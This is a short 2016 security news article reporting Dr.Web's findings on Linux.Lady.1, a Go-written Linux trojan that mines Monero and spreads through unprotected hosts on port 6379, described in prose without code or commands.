- Schneider Software Plan for InduSoft, InTouch Hole
- Schneider Updates its Triconex Tricon
- Rockwell Plan on Stratix Services Router Fix
- Rockwell Updates Stratix, ArmorStratix Switches
- Rockwell Mitigation Plan for Ethernet Switch
- U.S., UK OT Alert on Russians Hackers
- PAS: Safety System Attack Preventable
- Balchem Feeds off SHARP
Chemical Safety Incidents
Trojan Goes Cryptocurrency Mining
Thursday, August 11, 2016 @ 03:08 PM gHale
A new Linux Trojan can run a cryptocurrency mining program on an infected computer, researchers said.
Called Linux.Lady.1, the malware uses Google’s Go programming language and libraries available on GitHub, said researchers at antivirus company, Dr.Web.
RELATED STORIES
Trojan in Google Play Android Apps
APT Targets Energy, Pharma Industries
New Insider Threat Trojan
Trojan Converts PC into Proxy Server
Trojan Reappears after 9 Years
Attackers first used Go to create malware in 2012, but it just hasn’t gained any traction over the years.
Once it infects a system, the Linux malware collects information on the infected machine, including the operating system, CPUs and processes, the researchers said in a post.
The harvested data goes back to a command and control (C&C) server, which provides a configuration file for downloading a cryptocurrency mining application.
The sample analyzed by Dr.Web delivered an application designed for Monero (XMR) mining. Monero is an open source cryptocurrency currently valued at $2 per unit, but unlike Bitcoin, it can still end up mined using personal computers.
Researchers also said Linux.Lady.1 is capable of spreading to other Linux computers on the infected network. It does this by attempting to connect to remote hosts over port 6379 without a password. Researchers said the attackers are hoping there was a poor configuration of the host.
If the connection is successful, Linux.Lady.1 downloads a script from a specified URL and adds it to the Cron scheduler of the infected device. This script, detected by Dr.Web as Linux.DownLoader.196, is responsible for downloading and installing a copy of the Linux Trojan on the compromised device.
Leave a Reply
You must be logged in to post a comment.